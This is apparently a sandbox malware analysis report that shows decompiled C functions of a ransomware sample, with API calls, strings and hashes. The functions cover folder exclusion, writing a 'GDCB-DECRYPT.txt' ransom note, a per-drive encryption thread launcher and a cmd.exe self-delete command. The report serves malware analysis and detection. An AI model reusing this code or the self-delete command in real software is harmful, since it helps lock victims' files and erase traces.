Instruction ID: 1c74ff85e4bbe89c11da167877251bfadadfb1b789393fb2674ad8a1102b1764
Opcode Fuzzy Hash: 3f4a2b444d341badbc1f89ef671cf3f23f637359728da17f4d75482f5b004914
Instruction Fuzzy Hash: DF514D71E04218ABDB109F98DD48B9E7BB4FF85720F20806AE505BB290C7B56D85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406110 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00406110(void* __ecx) {
				void* _t9;
				intOrPtr* _t20;
				void* _t42;
				void* _t45;

				_t42 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E00407BA0(_t42, L"\\ProgramData\\") != 0 || E00407BA0(_t42, L"\\Program Files\\") != 0 || E00407BA0(_t42, L"\\Tor Browser\\") != 0 || E00407BA0(_t42, L"Ransomware") != 0 || E00407BA0(_t42, L"\\All Users\\") != 0) {
					L15:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t9 = E00407BA0(_t42, L"\\Local Settings\\");
					if(_t9 != 0) {
						goto L15;
					} else {
						_t20 = __imp__SHGetSpecialFolderPathW;
						_push(_t9);
						_push(0x2a);
						_push(_t45);
						_push(_t9);
						if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L15;
									}
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						} else {
							goto L15;
						}
					}
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 00406231

Strings

\Local Settings\, xrefs: 0040618F
Ransomware, xrefs: 00406167
\All Users\, xrefs: 0040617B
\Program Files\, xrefs: 0040613F
\Tor Browser\, xrefs: 00406153
\ProgramData\, xrefs: 00406129

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-106008693
Opcode ID: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
Instruction ID: f4f5e37f6e05bfd3754b73729b88660f17dd9cd9e6b304112d3c6a2927df81c1
Opcode Fuzzy Hash: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
Instruction Fuzzy Hash: F4213D3078021233EA2031662D6AB7F299E8BD5749F55447BBA02FA3C5FEBCEC15425D

Uniqueness

Uniqueness Score: -1.00%

Function 00406BA0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406BA0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

APIs

lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CE8
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CF6

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
Instruction ID: 0763c41813d47cec7f7f3bb87dd63c09dcdfaa37f7dde6f7b674e60aab311cac
Opcode Fuzzy Hash: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
Instruction Fuzzy Hash: BA412B32200611EFD7125FB8DE8C796BBB2FF04315F094539E416A2A62D775AC78DB88

Uniqueness

Uniqueness Score: -1.00%

Function 00405270 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405270(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,00405482), ref: 00405289
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00405482), ref: 0040529C
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00405482), ref: 004052B5
CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052D4
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052EA
lstrlenW.KERNEL32(?,?,?,?,?,00405482), ref: 004052FE
lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 0040530A
lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 00405329
UnmapViewOfFile.KERNEL32(?,?,?,?,?,00405482), ref: 0040533B
CloseHandle.KERNEL32(?,?,?,?,?,00405482), ref: 0040534A
CloseHandle.KERNEL32(00000000,?,?,?,?,00405482), ref: 00405351
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00405482), ref: 0040535F

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
Instruction ID: 2f98b26bd8e2ee7d85d2e29faddfdf40e9a873387be652c4beaa2a3b1dd5d715
Opcode Fuzzy Hash: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
Instruction Fuzzy Hash: 4231A531740715BBEB205B649D4EF5E7B68EB05B40F200075FB41BA2D2C6F5A9018FAC

Uniqueness

Uniqueness Score: -1.00%

Function 00406640 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406640(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0x412b04; // 0x412000
					if(_t7 != 0) {
						WriteFile(_t22,  *0x412b04, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0040665b
0x00406663
0x00406685
0x0040668a
0x0040669e
0x004066a5
0x004066be
0x004066be
0x004066c5
0x004066cb
0x0040668c
0x00406699
0x00406699
0x004066d8
0x004066e6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
wsprintfW.USER32 ref: 00406663
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
GetLastError.KERNEL32(?,?), ref: 0040668C
lstrlenW.KERNEL32(00412000,?,00000000,?,?), ref: 004066AE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 004066BE
CloseHandle.KERNEL32(00000000,?,?), ref: 004066C5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8

Strings

%s\GDCB-DECRYPT.txt, xrefs: 0040665D

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
Instruction ID: 9b1f1ee7684b205ce34ce946b48542e85b02e5c2206a3fbb18e6830c08f85e02
Opcode Fuzzy Hash: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
Instruction Fuzzy Hash: 2D0171753802107BF7205B64AE4EFAA3A6CEB49B15F100135FB05F91E1DBF96C11866D

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FD0() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x00404ff6
0x00404ffa
0x00404ffe
0x00405008
0x00405010
0x00405019
0x00405033
0x00405033
0x00405010
0x0040503b

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
wsprintfW.USER32 ref: 00405019
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
ExitProcess.KERNEL32 ref: 0040503B

Strings

cmd.exe, xrefs: 00405027
/c timeout -c 5 & del "%s" /f /q, xrefs: 00405013
open, xrefs: 0040502C

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
Instruction ID: 72ce1eeed403cc9d60347bc981b2010fd1fdc34af71b64a0c2a2ed5fbb2db01d
Opcode Fuzzy Hash: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
Instruction Fuzzy Hash: E2F0C971BC572277F2351B655D0FF4B2D689B85F56F250036BB087E2D28AF468008AED

Uniqueness

Uniqueness Score: -1.00%

Function 00403200 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403200(void* __ecx, char _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t1 =  &_a4; // 0x405135
				_t23 =  *_t1;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

APIs

lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403251
GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040325B
HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403262
lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403273
GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040327D
HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403284
lstrcpyA.KERNEL32(00000000,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403293

Strings

5Q@, xrefs: 00403203
5Q@, xrefs: 00403205, 00403250, 00403272, 00403291

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID: 5Q@$5Q@
API String ID: 511007297-547021831
Opcode ID: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
Instruction ID: bda05b356578e7771a31f68481e16acc2b94da25dd7eb2ac23c0ab8e8a28fe1a
Opcode Fuzzy Hash: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
Instruction Fuzzy Hash: 9A119330504295AAEB211F68990C767BF5CAF12352F2440BFE8C5FB391C7398D4687A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403DE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403DE0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				intOrPtr _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0x40e308; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00406840, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E00405540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00403E00
GetTickCount.KERNEL32 ref: 00403E25
GetDriveTypeW.KERNEL32(?), ref: 00403E4A
CreateThread.KERNEL32 ref: 00403E89
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00403ECB
GetTickCount.KERNEL32 ref: 00403ED1

Strings

?:\, xrefs: 00403E13

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
